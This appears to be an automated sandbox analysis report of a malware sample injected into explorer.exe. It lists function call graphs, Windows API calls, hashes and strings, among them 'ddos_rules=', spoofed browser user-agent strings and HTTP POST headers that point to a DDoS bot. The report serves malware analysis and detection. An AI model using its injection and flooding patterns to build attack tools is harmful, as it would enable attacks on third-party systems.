31d23a7 801->802 802->786 803->799 807 31d24b3 803->807 832 31d27b9 803->832 805 31d2750 805->799 806 31d2b1a 3 API calls 805->806 806->799 807->805 841 31d2b38 GetProcessHeap RtlAllocateHeap 807->841 809 31d25db wsprintfW 810 31d2601 809->810 814 31d2674 810->814 842 31d2b38 GetProcessHeap RtlAllocateHeap 810->842 812 31d263e wsprintfW 812->814 813 31d272e 815 31d2b1a 3 API calls 813->815 814->813 843 31d2b38 GetProcessHeap RtlAllocateHeap 814->843 817 31d273e 815->817 817->805 818 31d2b1a 3 API calls 817->818 818->805 819 31d2727 821 31d2b1a 3 API calls 819->821 820 31d26bd 820->819 844 31d2aec VirtualAlloc 820->844 821->813 823 31d2717 RtlMoveMemory 823->819 825 31d2795 824->825 826 31d23e2 824->826 827 31d29bc 2 API calls 825->827 828 31d2b38 GetProcessHeap RtlAllocateHeap 826->828 827->826 828->794 829->796 831 31d240f 830->831 831->799 831->800 833 31d2827 832->833 835 31d27c8 832->835 833->807 834 31d27ca DnsQuery_W 834->835 835->833 835->834 836 31d2809 DnsFree inet_ntoa 835->836 836->835 837 31d2829 836->837 845 31d2b38 GetProcessHeap RtlAllocateHeap 837->845 839 31d2833 846 31d2ab9 lstrlen MultiByteToWideChar 839->846 841->809 842->812 843->820 844->823 845->839 846->833 847 31d7633 848 31d7804 847->848 849 31d764b 847->849 848->848 850 31d775a LoadLibraryA 849->850 854 31d779f VirtualProtect VirtualProtect 849->854 851 31d7771 850->851 851->849 853 31d7783 GetProcAddress 851->853 853->851 855 31d7799 853->855 854->848

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_031D2ADD 1 Function_031D2B5F 2 Function_031D1F98 3 Function_031D28D8 11 Function_031D2B49 3->11 4 Function_031D2B1A 15 Function_031D2947 4->15 5 Function_031D2297 5->11 24 Function_031D2B38 5->24 6 Function_031D1016 6->15 6->24 29 Function_031D106E 6->29 7 Function_031D2990 8 Function_031D1F10 9 Function_031D234D 9->4 18 Function_031D23C2 9->18 9->24 10 Function_031D290C 12 Function_031D2848 13 Function_031D2A08 14 Function_031D278B 20 Function_031D29BC 14->20 16 Function_031D1000 16->6 17 Function_031D1140 17->0 17->9 17->10 17->20 21 Function_031D28FF 17->21 18->4 18->12 18->13 18->14 22 Function_031D2AB9 18->22 23 Function_031D27B9 18->23 18->24 27 Function_031D2AEC 18->27 19 Function_031D297D 23->22 23->24 25 Function_031D1FF6 25->0 25->4 25->10 25->18 25->20 25->24 26 Function_031D7633 28 Function_031D142C 28->2 28->3 28->4 28->5 28->8 28->11 28->20 28->21 28->24 28->27 30 Function_031D1FE9 28->30 31 Function_031D1F2A 28->31 33 Function_031D1F61 28->33 29->1 29->4 29->7 29->17 29->19 29->20 29->24 32 Function_031D3527

                            Executed Functions

                            Function 031D1016 Relevance: 4.5, APIs: 3, Instructions: 29nativenetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 031D2947: VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,031D102A), ref: 031D2954
                            • WSAStartup.WS2_32(00000202,?), ref: 031D103D
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 031D1059
                            • NtUnmapViewOfSection.NTDLL(000000FF), ref: 031D1062
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryMoveQuerySectionStartupUnmapViewVirtual
                            • String ID:
                            • API String ID: 2423705419-0
                            • Opcode ID: c5d9a8114d58b01058bacd4b95054bf188c2be9e2331700f39d0db78cac6216c
                            • Instruction ID: caa3c0ea386fa6cb49cf23e8889886c307f5ff32b61f7551c1ef7deb3e4f98fe
                            • Opcode Fuzzy Hash: c5d9a8114d58b01058bacd4b95054bf188c2be9e2331700f39d0db78cac6216c
                            • Instruction Fuzzy Hash: 03E02B3650331477C628B768BC0D9D63B5CAB0F330F004B25B9B8860D0DE71055482F2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D106E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 65sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 031D2B5F: GetTickCount.KERNEL32 ref: 031D2B5F
                              • Part of subcall function 031D2B38: GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                              • Part of subcall function 031D2B38: RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                            • wsprintfA.USER32 ref: 031D10BB
                              • Part of subcall function 031D2990: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 031D299A
                              • Part of subcall function 031D2990: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,031D10CF,?,?,?,?,?,00000363), ref: 031D29AC
                            • RtlMoveMemory.NTDLL(00000000,0000000A,00000000), ref: 031D1110
                            • Sleep.KERNELBASE(000003E8,?,?,?,?,?,00000363), ref: 031D1138
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: FileHeap$AllocateCountMappingMemoryMoveOpenProcessSleepTickViewwsprintf
                            • String ID: %s%s$ddos_rules=$|:|
                            • API String ID: 1711808818-2824953345
                            • Opcode ID: 13120c4886d61118bc192ba6d31a9f9765d272289f8099ce08c7c58214629774
                            • Instruction ID: e36e86506c2a2697b2690f0a0a69dbc2d09d97d7386427d0552f0fe1034012cb
                            • Opcode Fuzzy Hash: 13120c4886d61118bc192ba6d31a9f9765d272289f8099ce08c7c58214629774
                            • Instruction Fuzzy Hash: 4311BC787013106BC309FF74A88497E77569B8F610B444E28E9365F3C6EFB49D4B8662
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D7633 Relevance: 6.2, APIs: 4, Instructions: 200COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 28 31d7633-31d7645 29 31d780d 28->29 30 31d764b-31d7658 28->30 29->29 31 31d766a-31d766f 30->31 32 31d7671 31->32 33 31d7660-31d7665 32->33 34 31d7673 32->34 36 31d7666-31d7668 33->36 35 31d7678-31d767a 34->35 37 31d767c-31d7681 35->37 38 31d7683-31d7687 35->38 36->31 36->32 37->38 38->35 39 31d7689 38->39 40 31d768b-31d7692 39->40 41 31d7694-31d7699 39->41 40->35 40->41 42 31d76a8-31d76aa 41->42 43 31d769b-31d76a4 41->43 46 31d76ac-31d76b1 42->46 47 31d76b3-31d76b7 42->47 44 31d771a-31d771d 43->44 45 31d76a6 43->45 48 31d7722-31d7725 44->48 45->42 46->47 49 31d76b9-31d76be 47->49 50 31d76c0-31d76c2 47->50 51 31d7727-31d7729 48->51 49->50 52 31d76e4-31d76f3 50->52 53 31d76c4 50->53 51->48 56 31d772b-31d772e 51->56 54 31d76f5-31d76fc 52->54 55 31d7704-31d7711 52->55 57 31d76c5-31d76c7 53->57 54->54 60 31d76fe 54->60 55->55 61 31d7713-31d7715 55->61 56->48 62 31d7730-31d774c 56->62 58 31d76c9-31d76ce 57->58 59 31d76d0-31d76d4 57->59 58->59 59->57 63 31d76d6 59->63 60->36 61->36 62->51 64 31d774e 62->64 66 31d76d8-31d76df 63->66 67 31d76e1 63->67 65 31d7754-31d7758 64->65 68 31d779f-31d77a2 65->68 69 31d775a-31d7770 LoadLibraryA 65->69 66->57 66->67 67->52 71 31d77a5-31d77ac 68->71 70 31d7771-31d7776 69->70 70->65 72 31d7778-31d777a 70->72 73 31d77ae-31d77b0 71->73 74 31d77d0-31d7800 VirtualProtect * 2 71->74 75 31d777c-31d7782 72->75 76 31d7783-31d7790 GetProcAddress 72->76 77 31d77c3-31d77ce 73->77 78 31d77b2-31d77c1 73->78 79 31d7804-31d7808 74->79 75->76 80 31d7799-31d779c 76->80 81 31d7792-31d7797 76->81 77->78 78->71 79->79 82 31d780a 79->82 81->70 82->29
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507953764.00000000031D6000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D6000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d6000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: efe60f9a6d7f9ee73e931eaaa34431d1b65e703ff905e58be4891f701f0bb281
                            • Instruction ID: 52c3f72d1a36acac8ca27cdf563193e157fa5d340bd8dfa8ac032a68b4cb3e7c
                            • Opcode Fuzzy Hash: efe60f9a6d7f9ee73e931eaaa34431d1b65e703ff905e58be4891f701f0bb281
                            • Instruction Fuzzy Hash: C4513772A442525BE721CE7CCC847B5BBA4EB4B220B5D0BB9C5E5CB3C2F7945846C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D2990 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 92 31d2990-31d29a2 OpenFileMappingA 93 31d29a4-31d29b4 MapViewOfFile 92->93 94 31d29b7-31d29bb 92->94 93->94
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 031D299A
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,031D10CF,?,?,?,?,?,00000363), ref: 031D29AC
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 1a369911aa09bbc8de58885155547c16ee0ce44699dace56cc8a410fc081ff0e
                            • Instruction ID: 5b91f9bf5866449d369a9bc73462684be303e01457570958dad473659748ea1b
                            • Opcode Fuzzy Hash: 1a369911aa09bbc8de58885155547c16ee0ce44699dace56cc8a410fc081ff0e
                            • Instruction Fuzzy Hash: EFD017327022317BE7386A6A6C0CF93AEDDCF8BAE1B050525B95DD2180D6608851C2F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D297D Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 95 31d297d-31d298f UnmapViewOfFile FindCloseChangeNotification
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,?,031D1133,00000001,?,?,?,?,?,00000363), ref: 031D2981
                            • FindCloseChangeNotification.KERNELBASE(?,?,031D1133,00000001,?,?,?,?,?,00000363), ref: 031D2988
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: f7d6cd966a1020b7f5beea7f07876aecfadab412f017da8f88452099fcc87337
                            • Instruction ID: 0a90aa8d4879d842586563f783dfb36fc609378ea37caeb71af134c72ea94d87
                            • Opcode Fuzzy Hash: f7d6cd966a1020b7f5beea7f07876aecfadab412f017da8f88452099fcc87337
                            • Instruction Fuzzy Hash: 1AB0123E40713097831C3764784CDDB3F18EE4F2213054950F169810088728489187F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D2B38 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 96 31d2b38-31d2b48 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: 9cf281f19ab52d3515f54d637d7c6b007b5092c29b39345f1fc4f223c272a3d8
                            • Instruction ID: 18fca4c700a6a4cdeca294f2698bcb88681192ff818d70df90572d1d18f0dff1
                            • Opcode Fuzzy Hash: 9cf281f19ab52d3515f54d637d7c6b007b5092c29b39345f1fc4f223c272a3d8
                            • Instruction Fuzzy Hash: 85A00275553140EBDF48B7A4B90DA163628A749741F0089447195C5144996495548732
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 031D2297 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 62COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 452 31d2297-31d22b5 RtlGetVersion 453 31d22bb-31d22f9 call 31d2b38 call 31d2b49 * 2 452->453 454 31d2346-31d234c 452->454 461 31d22fb-31d22fc 453->461 462 31d2323 453->462 463 31d231c-31d2321 461->463 464 31d22fe-31d22ff 461->464 465 31d2328-31d2345 wsprintfA 462->465 463->465 466 31d2315-31d231a 464->466 467 31d2301-31d2302 464->467 465->454 466->465 468 31d230e-31d2313 467->468 469 31d2304-31d2305 467->469 468->465 469->462 470 31d2307-31d230c 469->470 470->465
                            APIs
                            • RtlGetVersion.NTDLL(?), ref: 031D22AD
                              • Part of subcall function 031D2B38: GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                              • Part of subcall function 031D2B38: RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                              • Part of subcall function 031D2B49: RtlRandom.NTDLL(031D4004), ref: 031D2B51
                            • wsprintfA.USER32 ref: 031D233C
                            Strings
                            • ; WOW64, xrefs: 031D22E9, 031D2329
                            • Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko, xrefs: 031D22A8
                            • ; Trident/7.0; rv:11.0) like Gecko, xrefs: 031D2323
                            • ; rv:58.0) Gecko/20100101 Firefox/58.0, xrefs: 031D231C, 031D2328
                            • ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67, xrefs: 031D230E
                            • Mozilla/5.0 (Windows NT %d.%d%s%s, xrefs: 031D2336
                            • ; Win64; x64, xrefs: 031D22EE
                            • ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36, xrefs: 031D2315
                            • ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299, xrefs: 031D2307
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcessRandomVersionwsprintf
                            • String ID: ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299$) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36$) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67$; Trident/7.0; rv:11.0) like Gecko$; WOW64$; Win64; x64$; rv:58.0) Gecko/20100101 Firefox/58.0$Mozilla/5.0 (Windows NT %d.%d%s%s$Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                            • API String ID: 2455419440-3524962460
                            • Opcode ID: 1456e6e7bbb10b217d95c18af025451598c0e3a43a9fd3f7e51fc0ff20fd47c6
                            • Instruction ID: 06b61760cdc7686d8b459c2475a0ecec260bc080013c93845816e01bb7949268
                            • Opcode Fuzzy Hash: 1456e6e7bbb10b217d95c18af025451598c0e3a43a9fd3f7e51fc0ff20fd47c6
                            • Instruction Fuzzy Hash: 7B010438B0021C77C62EEA2C6E417BDA25CDB4F701F880D69A576F6A00D77088838773
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D1F2A Relevance: 1.5, APIs: 1, Instructions: 27networkCOMMON
                            Download Yara Rule
                            APIs
                            • recv.WS2_32(00000000,00000000,00000064,00000000), ref: 031D1F42
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: f98b39d11d4593deeb72f246d11abd28706db5a274e2a81e0769f579e864561e
                            • Instruction ID: a71e39b6e158180d798ac503e7851674a89b6daae92df02ac39cfbcc095e56f0
                            • Opcode Fuzzy Hash: f98b39d11d4593deeb72f246d11abd28706db5a274e2a81e0769f579e864561e
                            • Instruction Fuzzy Hash: F5E086762051117BE758C87C9C48AB7A7ADDBCB270F184636F628CB182D760EC4A8271
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D1FF6 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 213stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 031D2B38: GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                              • Part of subcall function 031D2B38: RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                              • Part of subcall function 031D23C2: RtlZeroMemory.NTDLL(?,0000003C), ref: 031D245A
                              • Part of subcall function 031D290C: lstrlen.KERNEL32(031D4018,00000000,00000000,031D4018,031D11CD), ref: 031D2934
                              • Part of subcall function 031D290C: RtlMoveMemory.NTDLL(031D4FA4,031D4018,00000000), ref: 031D293D
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 031D204B
                            • CharLowerA.USER32(00000000), ref: 031D2052
                              • Part of subcall function 031D29BC: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,031D10E3,00000001,?,?,?,?,?,00000363), ref: 031D29CB
                              • Part of subcall function 031D29BC: lstrlen.KERNEL32(ddos_rules=,?,?,00000000,031D10E3,00000001,?,?,?,?,?,00000363), ref: 031D29D0
                            • lstrlen.KERNEL32(?,00000008), ref: 031D207B
                            • RtlMoveMemory.NTDLL(00000800,?,-00000001), ref: 031D208C
                            • RtlZeroMemory.NTDLL(00000000,00000800), ref: 031D214A
                            • RtlMoveMemory.NTDLL(00000000,-00000001,00000000), ref: 031D215B
                            • lstrlen.KERNEL32(00000000,00000001,00000001,00000001,?,-00000001,00000008), ref: 031D21A1
                            • RtlMoveMemory.NTDLL(00000200,00000000,-00000001), ref: 031D21B5
                            • wsprintfA.USER32 ref: 031D21DA
                            • wsprintfA.USER32 ref: 031D21F2
                            • lstrlen.KERNEL32(00000800), ref: 031D2202
                            • lstrlen.KERNEL32(00000400), ref: 031D2212
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: Memorylstrlen$Move$HeapZerowsprintf$AllocateCharLowerProcess
                            • String ID: %s%s$href$http
                            • API String ID: 3375510705-2989893046
                            • Opcode ID: 4fae9d007f2f679fc41a0a667c75e331aa64fc61f3c08a46bc3ce4fa3e3bdf49
                            • Instruction ID: 7d76c4d2a0ea9ffdadd6ed8fc769d748262678fb8ec2e28e78fab7557a5e43ab
                            • Opcode Fuzzy Hash: 4fae9d007f2f679fc41a0a667c75e331aa64fc61f3c08a46bc3ce4fa3e3bdf49
                            • Instruction Fuzzy Hash: 7061C5796003185FCB14EF34988476E7399AB8F210F144E28F9B6EB2C1DB74D94787A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D1140 Relevance: 18.2, APIs: 12, Instructions: 165stringthreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 471 31d1140-31d1150 472 31d1356-31d135d 471->472 473 31d1156-31d1166 lstrlen 471->473 473->472 474 31d116c-31d1181 RtlZeroMemory 473->474 475 31d11d3-31d11e8 474->475 476 31d1183-31d1198 call 31d29bc 474->476 477 31d11ea-31d11f2 475->477 478 31d1202-31d1205 475->478 476->475 486 31d119a-31d11d1 RtlZeroMemory RtlMoveMemory call 31d290c 476->486 480 31d11f8-31d11fa 477->480 481 31d1281-31d1288 477->481 478->472 482 31d120b 478->482 480->481 484 31d1200 480->484 487 31d128a-31d128c 481->487 485 31d120d-31d122d WaitForMultipleObjects 482->485 484->485 488 31d122f-31d1241 CloseHandle 485->488 489 31d1243-31d126f RtlZeroMemory call 31d234d call 31d2add 485->489 486->475 486->476 491 31d1331-31d134e call 31d234d 487->491 492 31d1292-31d129a 487->492 488->488 488->489 489->472 508 31d1275-31d127b 489->508 491->472 493 31d129c-31d12d5 lstrlen RtlComputeCrc32 call 31d28ff 492->493 494 31d12fa-31d131f lstrlen RtlComputeCrc32 492->494 503 31d132b-31d132c 493->503 505 31d12d7-31d12da 493->505 494->485 499 31d1325 494->499 499->503 503->487 505->503 507 31d12dc-31d12f8 CreateThread 505->507 507->499 508->481
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 031D1157
                            • RtlZeroMemory.NTDLL(00040744), ref: 031D1179
                            • RtlZeroMemory.NTDLL(031D4018,00000104), ref: 031D11A4
                            • RtlMoveMemory.NTDLL(031D4018,00000000,-00000001), ref: 031D11BA
                              • Part of subcall function 031D290C: lstrlen.KERNEL32(031D4018,00000000,00000000,031D4018,031D11CD), ref: 031D2934
                              • Part of subcall function 031D290C: RtlMoveMemory.NTDLL(031D4FA4,031D4018,00000000), ref: 031D293D
                            • WaitForMultipleObjects.KERNEL32(031D400C,031D4010,00000001,000000FF), ref: 031D121E
                            • CloseHandle.KERNEL32(?), ref: 031D1233
                            • RtlZeroMemory.NTDLL(031D400C,00000324), ref: 031D1249
                            • lstrlen.KERNEL32(?,?,?,?), ref: 031D12A2
                            • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 031D12B4
                            • CreateThread.KERNEL32(00000000,00000000,031D135E,00000000,00000000,00000000), ref: 031D12E8
                            • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 031D12FE
                            • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 031D1310
                              • Part of subcall function 031D29BC: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,031D10E3,00000001,?,?,?,?,?,00000363), ref: 031D29CB
                              • Part of subcall function 031D29BC: lstrlen.KERNEL32(ddos_rules=,?,?,00000000,031D10E3,00000001,?,?,?,?,?,00000363), ref: 031D29D0
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: lstrlen$Memory$Zero$ComputeCrc32Move$CloseCreateHandleMultipleObjectsThreadWait
                            • String ID:
                            • API String ID: 729650260-0
                            • Opcode ID: dfe081af59d57071776a8f31b601896f79d49752174f613fc26b5f6cc385ea4d
                            • Instruction ID: b455d9749138b835209f7e44dc1c0c0e80c5cbaca8d49866a3aa15c066d053d0
                            • Opcode Fuzzy Hash: dfe081af59d57071776a8f31b601896f79d49752174f613fc26b5f6cc385ea4d
                            • Instruction Fuzzy Hash: 29511239606224FFD718EF64F884BA973A9EB4F310F140578E99187284DF31A895CB71
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D23C2 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 509 31d23c2-31d241e call 31d278b call 31d2b38 call 31d2ab9 call 31d2848 518 31d2439-31d2445 509->518 519 31d2420-31d2437 509->519 522 31d2449-31d244b 518->522 519->522 523 31d2778-31d2788 call 31d2b1a 522->523 524 31d2451-31d2487 RtlZeroMemory 522->524 528 31d248d-31d24a8 524->528 529 31d2771 524->529 530 31d24aa-31d24bb call 31d27b9 528->530 531 31d24d6-31d24e8 528->531 529->523 535 31d24bd-31d24cc 530->535 536 31d24ce 530->536 537 31d24ec-31d24ee 531->537 538 31d24d0-31d24d4 535->538 536->538 539 31d275e-31d2764 537->539 540 31d24f4-31d2508 537->540 538->537 542 31d276d 539->542 543 31d2766-31d2768 call 31d2b1a 539->543 544 31d256b-31d2572 540->544 545 31d250a-31d250b 540->545 542->529 543->542 546 31d2574-31d25a6 544->546 548 31d250d-31d2520 545->548 549 31d2554-31d2569 545->549 555 31d25ac-31d25b1 546->555 556 31d2754 546->556 550 31d2547-31d2552 548->550 551 31d2522-31d2543 call 31d2a08 548->551 549->546 550->546 551->550 557 31d25d1-31d25ff call 31d2b38 wsprintfW 555->557 558 31d25b3-31d25ca 555->558 556->539 561 31d2618-31d2632 557->561 562 31d2601-31d2603 557->562 558->557 568 31d2674-31d2690 561->568 569 31d2634-31d266d call 31d2b38 wsprintfW 561->569 563 31d2604-31d2607 562->563 564 31d2609-31d260e 563->564 565 31d2612-31d2614 563->565 564->563 567 31d2610 564->567 565->561 567->561 573 31d272e-31d2747 call 31d2b1a 568->573 574 31d2696-31d26a2 568->574 569->568 582 31d2749-31d274b call 31d2b1a 573->582 583 31d2750 573->583 574->573 577 31d26a8-31d26c4 call 31d2b38 574->577 584 31d26c6-31d26d1 577->584 582->583 583->556 586 31d26e5-31d26fc 584->586 587 31d26d3-31d26e0 call 31d2afd 584->587 591 31d26fe 586->591 592 31d2700-31d270a 586->592 587->586 591->592 592->584 593 31d270c-31d2710 592->593 594 31d2727-31d2729 call 31d2b1a 593->594 595 31d2712 593->595 594->573 597 31d2712 call 31d2aec 595->597 598 31d2717-31d2721 RtlMoveMemory 597->598 598->594
                            APIs
                              • Part of subcall function 031D2B38: GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                              • Part of subcall function 031D2B38: RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                              • Part of subcall function 031D2AB9: lstrlen.KERNEL32(?,00000000,00000000,00000000,031D23FF,00000000,?,?,00000001), ref: 031D2AC1
                              • Part of subcall function 031D2AB9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,00000001), ref: 031D2AD3
                              • Part of subcall function 031D2848: RtlZeroMemory.NTDLL(?,00000018), ref: 031D285B
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 031D245A
                            • wsprintfW.USER32 ref: 031D25EB
                            • wsprintfW.USER32 ref: 031D265C
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 031D2721
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: fae61ac2eef9a382aa3f464c30fdc83abbde61dca10618dc18e0d3f138f3aaf5
                            • Instruction ID: 0e05412a19f1be4b8ed13e837b7bcfc1c40892311b2976dcdbb2468211fbe287
                            • Opcode Fuzzy Hash: fae61ac2eef9a382aa3f464c30fdc83abbde61dca10618dc18e0d3f138f3aaf5
                            • Instruction Fuzzy Hash: 04B17E78609341AFD724EF64D944A6BBBE8FF8E244F044D2DF9A5C7250DB309846CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 031D1F98 Relevance: 6.0, APIs: 4, Instructions: 33networkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 599 31d1f98-31d1fe6 RtlZeroMemory htons inet_addr connect
                            APIs
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryZeroconnecthtonsinet_addr
                            • String ID:
                            • API String ID: 3356813580-0
                            • Opcode ID: fae0a6f44bc21d975b6ffdcd3a32e858098b553fd02a229d9f5ec9166cffdbc5
                            • Instruction ID: 41b2c8c6db32aaf29ac9ac22d64c51ebc0ef37ef8a57a49c29f1d50207ef7932
                            • Opcode Fuzzy Hash: fae0a6f44bc21d975b6ffdcd3a32e858098b553fd02a229d9f5ec9166cffdbc5
                            • Instruction Fuzzy Hash: F7F054759022096BDB00AB94EC09DFF777CEF49710F000516E94592140D671499587B6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:10.5%
